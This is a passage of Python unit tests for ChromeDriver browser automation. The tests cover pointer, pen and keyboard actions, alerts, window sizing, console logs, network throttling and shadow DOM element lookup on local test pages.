y: event.touches[event.touches.length - 1].clientY});
});
div.addEventListener('touchend', event => {
window.events.push(
{type: event.type});
});
''')
time.sleep(1)
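    # Two touch pointer sources tap at (50, 50) and (60, 60); the page should
    # record a touchstart for each contact followed by two touchends.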
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerDown"},
{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer1"},
{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 60, "y": 60},
{"type": "pointerDown"},
{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer2"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(4, len(events))
self.assertEquals("touchstart", events[0]['type'])
self.assertEquals("touchstart", events[1]['type'])
self.assertEquals("touchend", events[2]['type'])
self.assertEquals("touchend", events[3]['type'])
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
self.assertAlmostEqual(60, events[1]['x'], delta=1)
self.assertAlmostEqual(60, events[1]['y'], delta=1)
self._driver.ReleaseActions()
def testActionsMulti(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<div id='div' autofocus style='width:200px; height:200px'>";
window.events = [];
const div = document.getElementById('div');
div.addEventListener('click', event => {
window.events.push(
{x: event.clientX, y: event.clientY});
});
''')
# Move mouse to (50, 50).
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50} ]
}
]})
# Click mouse button. ChromeDriver should remember that mouse is at
# (50, 50).
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerDown', "button": 0},
{'type': 'pointerUp', "button": 0}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(1, len(events))
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
# Clean up action states, move mouse back to (0, 0).
self._driver.ReleaseActions()
# Move mouse relative by (80, 80) pixels, and then click.
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'},
{'type': 'pointerDown', "button": 0},
{'type': 'pointerUp', "button": 0}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(2, len(events))
self.assertAlmostEqual(80, events[1]['x'], delta=1)
self.assertAlmostEqual(80, events[1]['y'], delta=1)
self._driver.ReleaseActions()
def testActionsPenPointerEventProperties(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div>test</div>";
var div = document.getElementsByTagName("div")[0];
div.style["width"] = "100px";
div.style["height"] = "100px";
window.events = [];
div.addEventListener("pointerdown", event => {
window.events.push(
{type: event.type,
x: event.clientX,
y: event.clientY,
width: event.width,
height: event.height,
pressure: event.pressure,
tiltX: event.tiltX,
tiltY: event.tiltY,
twist: event.twist});
});
''')
time.sleep(1)
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 30, "y": 30},
{"type": "pointerDown", "button": 0, "pressure":0.55,
"tiltX":-36, "tiltY":83, "twist":266},
{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(1, len(events))
self.assertEquals("pointerdown", events[0]['type'])
self.assertAlmostEqual(30, events[0]['x'], delta=1)
self.assertAlmostEqual(30, events[0]['y'], delta=1)
self.assertEquals(1.0, round(events[0]['width'], 2))
self.assertEquals(1.0, round(events[0]['height'], 2))
self.assertEquals(0.55, round(events[0]['pressure'], 2))
self.assertEquals(-36, events[0]['tiltX'])
self.assertEquals(83, events[0]['tiltY'])
self.assertEquals(266, events[0]['twist'])
def testActionsPenPointerEventPressure(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div>test</div>";
var div = document.getElementsByTagName("div")[0];
div.style["width"] = "100px";
div.style["height"] = "100px";
window.events = [];
var event_list = ["pointerdown", "pointermove", "pointerup"];
for (var i = 0; i < event_list.length; i++) {
div.addEventListener(event_list[i], event => {
window.events.push(
{type: event.type,
x: event.clientX,
y: event.clientY,
pressure: event.pressure,
twist: event.twist});
});
}
''')
time.sleep(1)
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 30, "y": 30},
{"type": "pointerDown", "button": 0,
"twist":30},
{"type": "pointerMove", "x": 50, "y": 50},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "pen"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
time.sleep(1)
events = self._driver.ExecuteScript('return window.events')
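    # Expected sequence: a hover pointermove (pressure 0), pointerdown with
    # default pressure 0.5, a pointermove while pressed (0.5), and pointerup
    # (0).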
self.assertEquals(4, len(events))
self.assertEquals("pointermove", events[0]['type'])
self.assertAlmostEqual(30, events[0]['x'], delta=1)
self.assertAlmostEqual(30, events[0]['y'], delta=1)
self.assertEquals(0.0, round(events[0]['pressure'], 2))
self.assertEquals(0, events[0]['twist'])
self.assertEquals("pointerdown", events[1]['type'])
self.assertAlmostEqual(30, events[1]['x'], delta=1)
self.assertAlmostEqual(30, events[1]['y'], delta=1)
self.assertEquals(0.5, round(events[1]['pressure'], 2))
self.assertEquals(30, events[1]['twist'])
self.assertEquals("pointermove", events[2]['type'])
self.assertAlmostEqual(50, events[2]['x'], delta=1)
self.assertAlmostEqual(50, events[2]['y'], delta=1)
self.assertEquals(0.5, round(events[2]['pressure'], 2))
self.assertEquals(0, events[2]['twist'])
self.assertEquals("pointerup", events[3]['type'])
self.assertAlmostEqual(50, events[3]['x'], delta=1)
self.assertAlmostEqual(50, events[3]['y'], delta=1)
self.assertEquals(0.0, round(events[3]['pressure'], 2))
self.assertEquals(0, events[3]['twist'])
def testActionsPause(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<input type='text' autofocus style='width:100px; height:100px'>";
window.events = [];
const input = document.getElementsByTagName("input")[0];
const listener
= e => window.events.push({type: e.type, time: e.timeStamp});
input.addEventListener("keydown", listener);
input.addEventListener("keyup", listener);
input.addEventListener("mousedown", listener);
''')
# Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4.
# Tick "key" device "pointer" device "none" device
# 0 move
# 1 pause 200 ms pointer down pause 100 ms
# 2 "a" key down pointer up pause 200 ms
# 3 "a" key up pause 200 ms
# 4 "b" key down move 200 ms
# 5 "b" key up
actions = {'actions': [
{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause', 'duration': 200},
{'type': 'keyDown', 'value': 'a'},
{'type': 'keyUp', 'value': 'a'},
{'type': 'keyDown', 'value': 'b'},
{'type': 'keyUp', 'value': 'b'},
]
},
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 50, 'y': 50},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause', 'duration': 200},
{'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10},
]
},
{
'type': 'none',
'id': 'none',
'actions': [
{'type': 'pause'},
{'type': 'pause', 'duration': 100},
{'type': 'pause', 'duration': 200},
]
}
]}
self._driver.PerformActions(actions)
events = self._driver.ExecuteScript('return window.events')
expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup']
self.assertEquals(len(expected_events), len(events))
for i in range(len(events)):
self.assertEqual(expected_events[i], events[i]['type'])
if i > 0:
elapsed_time = events[i]['time'] - events[i-1]['time']
self.assertGreaterEqual(elapsed_time, 200)
def testReleaseActions(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<input id='target' type='text' style='width:200px; height:200px'>";
window.events = [];
const recordKeyEvent = event => {
window.events.push(
{type: event.type, code: event.code});
};
const recordMouseEvent = event => {
window.events.push(
{type: event.type, x: event.clientX, y: event.clientY});
};
const target = document.getElementById('target');
target.addEventListener('keydown', recordKeyEvent);
target.addEventListener('keyup', recordKeyEvent);
target.addEventListener('mousedown', recordMouseEvent);
target.addEventListener('mouseup', recordMouseEvent);
''')
# Move mouse to (50, 50), press a mouse button, and press a key.
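    # The key source pads with two pauses so its keyDown lands in the tick
    # after the pointerDown.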
self._driver.PerformActions({'actions': [
{
'type': 'pointer',
'id': 'mouse',
'actions': [
{'type': 'pointerMove', 'x': 50, 'y': 50},
{'type': 'pointerDown', "button": 0}
]
},
{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': 'a'}
]
}
]})
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(2, len(events))
self.assertEquals('mousedown', events[0]['type'])
self.assertAlmostEqual(50, events[0]['x'], delta=1)
self.assertAlmostEqual(50, events[0]['y'], delta=1)
self.assertEquals('keydown', events[1]['type'])
self.assertEquals('KeyA', events[1]['code'])
self._driver.ReleaseActions()
events = self._driver.ExecuteScript('return window.events')
self.assertEquals(4, len(events))
self.assertEquals('keyup', events[2]['type'])
self.assertEquals('KeyA', events[2]['code'])
self.assertEquals('mouseup', events[3]['type'])
self.assertAlmostEqual(50, events[3]['x'], delta=1)
self.assertAlmostEqual(50, events[3]['y'], delta=1)
def testActionsCtrlCommandKeys(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('''
document.write('<input type="text" id="text1" value="Hello World" />');
document.write('<br/>')
document.write('<input type="text" id="text2">');
var text1 = document.getElementById("text1");
text1.addEventListener("click", function() {
var text1 = document.getElementById("text1");
text1.value="new text";
});
''')
time.sleep(1)
elem1 = self._driver.FindElement('css selector', '#text1')
elem2 = self._driver.FindElement('css selector', '#text2')
self.assertEquals("Hello World", elem1.GetProperty('value'))
time.sleep(1)
platform = util.GetPlatformName()
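    # WebDriver key codes: u'\uE009' is Control and u'\uE03D' is Meta/Command
    # (used on Mac).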
modifier_key = u'\uE009'
if platform == 'mac':
modifier_key = u'\uE03D'
    # Sequence of actions: click input field "elem1", press ctrl/cmd+'a' to
    # select all of its text and ctrl/cmd+'x' to cut it, then click input
    # field "elem2" and press ctrl/cmd+'v' to paste. Finally, both fields are
    # checked to verify that the text was cut from "elem1" and pasted into
    # "elem2".
actions = ({'actions': [{
'type': 'key',
'id': 'key',
'actions': [
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': modifier_key},
{'type': 'keyDown', 'value': 'a'},
{'type': 'keyUp', 'value': 'a'},
{'type': 'keyDown', 'value': 'x'},
{'type': 'keyUp', 'value': 'x'},
{'type': 'keyUp', 'value': modifier_key},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'keyDown', 'value': modifier_key},
{'type': 'keyDown', 'value': 'v'},
{'type': 'keyUp', 'value': 'v'},
{'type': 'keyUp', 'value': modifier_key}
]}, {
'type':'pointer',
'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerUp', 'button': 0},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'},
{'type': 'pause'}],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}
]})
self._driver.PerformActions(actions)
time.sleep(1)
self.assertEquals("", elem1.GetProperty('value'))
self.assertEquals("new text", elem2.GetProperty('value'))
time.sleep(1)
def testPageLoadStrategyIsNormalByDefault(self):
self.assertEquals('normal',
self._driver.capabilities['pageLoadStrategy'])
def testClearElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'return document.getElementsByTagName("input")[0];')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('abc', value)
text.Clear()
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('', value)
def testSendKeysToInputFileElement(self):
file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png')
self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/file_input.html'))
elem = self._driver.FindElement('css selector', '#id_file')
elem.SendKeys(file_name)
text = self._driver.ExecuteScript(
'var input = document.getElementById("id_file").value;'
'return input;')
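    # The value of a file input hides the real local path and is reported as
    # C:\fakepath\<filename>.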
    self.assertEquals('C:\\fakepath\\anchor_download_test.png', text)
if not _ANDROID_PACKAGE_KEY:
self.assertRaises(chromedriver.InvalidArgument,
elem.SendKeys, "/blah/blah/blah")
def testSendKeysToNonTypeableInputElement(self):
self._driver.Load("about:blank")
self._driver.ExecuteScript(
"document.body.innerHTML = '<input type=\"color\">';")
    elem = self._driver.FindElement('tag name', 'input')
input_value = '#7fffd4'
elem.SendKeys(input_value)
value = elem.GetProperty('value')
self.assertEquals(input_value, value)
def testSendKeysNonBmp(self):
self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/two_inputs.html'))
elem = self._driver.FindElement('css selector', '#first')
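    # The string contains U+1F4A9, a character outside the Basic Multilingual
    # Plane, so this exercises non-BMP handling in SendKeys.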
expected = u'T\U0001f4a9XL\u0436'.encode('utf-8')
elem.SendKeys(expected)
actual = elem.GetProperty('value').encode('utf-8')
self.assertEquals(expected, actual)
def testGetElementAttribute(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/attribute_colon_test.html'))
elem = self._driver.FindElement("css selector", "*[name='phones']")
self.assertEquals('3', elem.GetAttribute('size'))
def testGetElementProperty(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/two_inputs.html'))
elem = self._driver.FindElement("css selector", "#first")
self.assertEquals('text', elem.GetProperty('type'))
self.assertEquals('first', elem.GetProperty('id'))
def testGetElementSpecialCharAttribute(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/attribute_colon_test.html'))
elem = self._driver.FindElement("css selector", "*[name='phones']")
self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip'))
def testGetCurrentUrl(self):
url = self.GetHttpUrlForFile('/chromedriver/frame_test.html')
self._driver.Load(url)
self.assertEquals(url, self._driver.GetCurrentUrl())
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertEquals(url, self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testDontGoBackOrGoForward(self):
# We need to run this test in a new tab so that it is isolated from previous
# test runs.
old_windows = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window = self.WaitForNewWindow(self._driver, old_windows)
self._driver.SwitchToWindow(new_window)
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
self._driver.GoBack()
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
self._driver.GoForward()
self.assertEquals('about:blank', self._driver.GetCurrentUrl())
def testBackNavigationAfterClickElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
link = self._driver.FindElement('css selector', '#l1')
link.Click()
self._driver.GoBack()
self.assertNotEqual('data:,', self._driver.GetCurrentUrl())
self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'),
self._driver.GetCurrentUrl())
def testAlertHandlingOnPageUnload(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
self._driver.FindElement('tag name', 'body').Click()
self._driver.GoBack()
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(True)
self.assertFalse(self._driver.IsAlertOpen())
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testSendTextToAlert(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('prompt = window.prompt()')
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(True, 'TextToPrompt')
self.assertEquals('TextToPrompt',
self._driver.ExecuteScript('return prompt'))
self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
self.assertRaises(chromedriver.ElementNotInteractable,
self._driver.HandleAlert,
True, 'textToConfirm')
    self._driver.HandleAlert(True)  # Close the previous alert.
self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
self._driver.FindElement('tag name', 'body').Click()
self._driver.Refresh()
self.assertTrue(self._driver.IsAlertOpen())
self.assertRaises(chromedriver.UnsupportedOperation,
self._driver.HandleAlert,
True, 'textToOnBeforeUnload')
def testAlertOnNewWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_windows = self._driver.GetWindowHandles()
self._driver.ExecuteScript("window.open('%s')" %
self.GetHttpUrlForFile('/chromedriver/alert_onload.html'))
new_window = self.WaitForNewWindow(self._driver, old_windows)
self.assertNotEqual(None, new_window)
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsAlertOpen())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tag name', 'a').Click()
new_window = self.WaitForNewWindow(self._driver, old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tag name', 'body'))
def testWindowPosition(self):
rect = self._driver.GetWindowRect()
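    # The rect list is ordered [width, height, x, y]; setting the position to
    # its current values should leave the rect unchanged.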
self._driver.SetWindowRect(None, None, rect[2], rect[3])
self.assertEquals(rect, self._driver.GetWindowRect())
# Resize so the window isn't moved offscreen.
# See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowRect(640, 400, None, None)
self._driver.SetWindowRect(None, None, 100, 200)
self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect())
def testWindowSize(self):
rect = self._driver.GetWindowRect()
self._driver.SetWindowRect(rect[0], rect[1], None, None)
self.assertEquals(rect, self._driver.GetWindowRect())
self._driver.SetWindowRect(640, 400, None, None)
self.assertEquals([640, 400, rect[2], rect[3]],
self._driver.GetWindowRect())
def testWindowRect(self):
old_window_rect = self._driver.GetWindowRect()
self._driver.SetWindowRect(*old_window_rect)
self.assertEquals(self._driver.GetWindowRect(), old_window_rect)
target_window_rect = [640, 400, 100, 200]
target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200}
returned_window_rect = self._driver.SetWindowRect(*target_window_rect)
self.assertEquals(self._driver.GetWindowRect(), target_window_rect)
self.assertEquals(returned_window_rect, target_window_rect_dict)
def testWindowMaximize(self):
old_rect_list = [640, 400, 100, 200]
self._driver.SetWindowRect(*old_rect_list)
new_rect = self._driver.MaximizeWindow()
new_rect_list = [
new_rect['width'],
new_rect['height'],
new_rect['x'],
new_rect['y']
]
self.assertNotEqual(old_rect_list, new_rect_list)
self._driver.SetWindowRect(*old_rect_list)
self.assertEquals(old_rect_list, self._driver.GetWindowRect())
def testWindowMinimize(self):
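    # Window handles appear to be the DevTools target id prefixed with
    # "CDwindow-"; stripping the prefix yields the targetId for the
    # Browser.getWindowForTarget call below.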
handle_prefix = "CDwindow-"
handle = self._driver.GetCurrentWindowHandle()
target = handle[len(handle_prefix):]
self._driver.SetWindowRect(640, 400, 100, 200)
rect = self._driver.MinimizeWindow()
expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100}
    # Check that MinimizeWindow returned the expected rect.
for key in expected_rect.keys():
self.assertEquals(expected_rect[key], rect[key])
    # Check that the window is minimized.
res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget',
{'targetId': target})
self.assertEquals('minimized', res['bounds']['windowState'])
def testWindowFullScreen(self):
old_rect_list = [640, 400, 100, 200]
self._driver.SetWindowRect(*old_rect_list)
self.assertEquals(self._driver.GetWindowRect(), old_rect_list)
new_rect = self._driver.FullScreenWindow()
new_rect_list = [
new_rect['width'],
new_rect['height'],
new_rect['x'],
new_rect['y']
]
self.assertNotEqual(old_rect_list, new_rect_list)
self._driver.SetWindowRect(*old_rect_list)
for i in range(10):
if old_rect_list == self._driver.GetWindowRect():
break
time.sleep(0.1)
self.assertEquals(old_rect_list, self._driver.GetWindowRect())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEqual('javascript', logs[0]['source'])
self.assertTrue('TypeError' in logs[0]['message'])
self.assertEqual('network', logs[1]['source'])
self.assertTrue('nonexistent.png' in logs[1]['message'])
self.assertTrue('404' in logs[1]['message'])
# Sometimes, we also get an error for a missing favicon.
if len(logs) > 2:
self.assertEqual('network', logs[2]['source'])
self.assertTrue('favicon.ico' in logs[2]['message'])
self.assertTrue('404' in logs[2]['message'])
self.assertEqual(3, len(logs))
else:
self.assertEqual(2, len(logs))
def testPendingConsoleLog(self):
new_logs = [""]
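    # Use a one-element list so the nested helper below can store its result
    # from within the closure.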
def GetPendingLogs(driver):
response = driver.GetLog('browser')
new_logs[0] = [x for x in response if x['source'] == 'console-api']
return new_logs[0]
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/pending_console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEqual('console-api', logs[0]['source'])
self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message'])
    self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0, 6)
self.assertEqual('console-api', new_logs[0][0]['source'])
self.assertTrue('"RepeatedError" "Second" "Third"' in
new_logs[0][0]['message'])
def testGetLogOnClosedWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
self.WaitForNewWindow(self._driver, old_handles)
self._driver.CloseWindow()
try:
self._driver.GetLog('browser')
except chromedriver.ChromeDriverException as e:
self.fail('exception while calling GetLog on a closed tab: ' + e.message)
def testGetLogOnWindowWithAlert(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('alert("alert!");')
try:
self._driver.GetLog('browser')
except Exception as e:
self.fail(e.message)
def testDoesntHangOnDebugger(self):
self._driver.Load('about:blank')
self._driver.ExecuteScript('debugger;')
def testChromeDriverSendLargeData(self):
script = 'return "0".repeat(10e6);'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testEmulateNetworkConditions(self):
    # Network conditions must be set before they can be retrieved.
self.assertRaises(chromedriver.UnknownError,
self._driver.GetNetworkConditions)
# DSL: 2Mbps throughput, 5ms RTT
latency = 5
throughput = 2048 * 1024
self._driver.SetNetworkConditions(latency, throughput, throughput)
network = self._driver.GetNetworkConditions()
    self.assertEquals(latency, network['latency'])
    self.assertEquals(throughput, network['download_throughput'])
    self.assertEquals(throughput, network['upload_throughput'])
    self.assertEquals(False, network['offline'])
    # Network conditions can no longer be retrieved once they've been deleted.
self._driver.DeleteNetworkConditions()
self.assertRaises(chromedriver.UnknownError,
self._driver.GetNetworkConditions)
def testEmulateNetworkConditionsName(self):
# DSL: 2Mbps throughput, 5ms RTT
# latency = 5
# throughput = 2048 * 1024
self._driver.SetNetworkConditionsName('DSL')
network = self._driver.GetNetworkConditions()
    self.assertEquals(5, network['latency'])
    self.assertEquals(2048*1024, network['download_throughput'])
    self.assertEquals(2048*1024, network['upload_throughput'])
    self.assertEquals(False, network['offline'])
def testEmulateNetworkConditionsSpeed(self):
# Warm up the browser.
self._http_server.SetDataForPath(
'/', "<html><body>blank</body></html>")
self._driver.Load(self._http_server.GetUrl() + '/')
# DSL: 2Mbps throughput, 5ms RTT
latency = 5
throughput_kbps = 2048
throughput = throughput_kbps * 1024
self._driver.SetNetworkConditions(latency, throughput, throughput)
_32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
_1_megabyte = _32_bytes * 32768
self._http_server.SetDataForPath(
'/1MB',
"<html><body>%s</body></html>" % _1_megabyte)
start = monotonic()
self._driver.Load(self._http_server.GetUrl() + '/1MB')
finish = monotonic()
duration = finish - start
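    # The page body is 1 MiB (32 bytes * 32768), so 1024 / duration gives the
    # observed rate in the same units as throughput_kbps; the test allows a
    # factor of 1.5 deviation in either direction.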
actual_throughput_kbps = 1024 / duration
self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)
def testEmulateNetworkConditionsNameSpeed(self):
# Warm up the browser.
self._http_server.SetDataForPath(
'/', "<html><body>blank</body></html>")
self._driver.Load(self._http_server.GetUrl() + '/')
# DSL: 2Mbps throughput, 5ms RTT
throughput_kbps = 2048
throughput = throughput_kbps * 1024
self._driver.SetNetworkConditionsName('DSL')
_32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
_1_megabyte = _32_bytes * 32768
self._http_server.SetDataForPath(
'/1MB',
"<html><body>%s</body></html>" % _1_megabyte)
start = monotonic()
self._driver.Load(self._http_server.GetUrl() + '/1MB')
finish = monotonic()
duration = finish - start
actual_throughput_kbps = 1024 / duration
self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)
def testEmulateNetworkConditionsOffline(self):
# A workaround for crbug.com/177511; when setting offline, the throughputs
# must be 0.
self._driver.SetNetworkConditions(0, 0, 0, offline=True)
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.Load,
self.GetHttpUrlForFile('/chromedriver/page_test.html'))
# The "X is not available" title is set after the page load event fires, so
# we have to explicitly wait for this to change. We can't rely on the
# navigation tracker to block the call to Load() above.
self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle())
def testSendCommandAndGetResult(self):
"""Sends a custom command to the DevTools debugger and gets the result"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
params = {}
document = self._driver.SendCommandAndGetResult('DOM.getDocument', params)
self.assertTrue('root' in document)
def _FindElementInShadowDom(self, css_selectors):
"""Find an element inside shadow DOM using CSS selectors.
    The last item in css_selectors identifies the element to find. All
    preceding selectors identify the hierarchy of shadow hosts to traverse in
    order to reach the target shadow DOM."""
current = None
for selector in css_selectors:
if current is None:
# First CSS selector, start from root DOM.
current = self._driver
else:
# current is a shadow host selected previously.
# Enter the corresponding shadow root.
current = self._driver.ExecuteScript(
'return arguments[0].shadowRoot', current)
current = current.FindElement('css selector', selector)
return current
def testShadowDomFindElement(self):
"""Checks that chromedriver can find elements in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
self.assertTrue(self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#textBox"]))
def testShadowDomFindChildElement(self):
"""Checks that chromedriver can find child elements from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#childDiv"])
self.assertTrue(elem.FindElement("css selector", "#textBox"))
def testShadowDomFindElementFailsFromRoot(self):
"""Checks that chromedriver can't find elements in a shadow DOM from
root."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# can't find element from the root without /deep/
with self.assertRaises(chromedriver.NoSuchElement):
self._driver.FindElement("css selector", "#textBox")
def testShadowDomText(self):
"""Checks that chromedriver can find extract the text from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#heading"])
self.assertEqual("Child", elem.GetText())
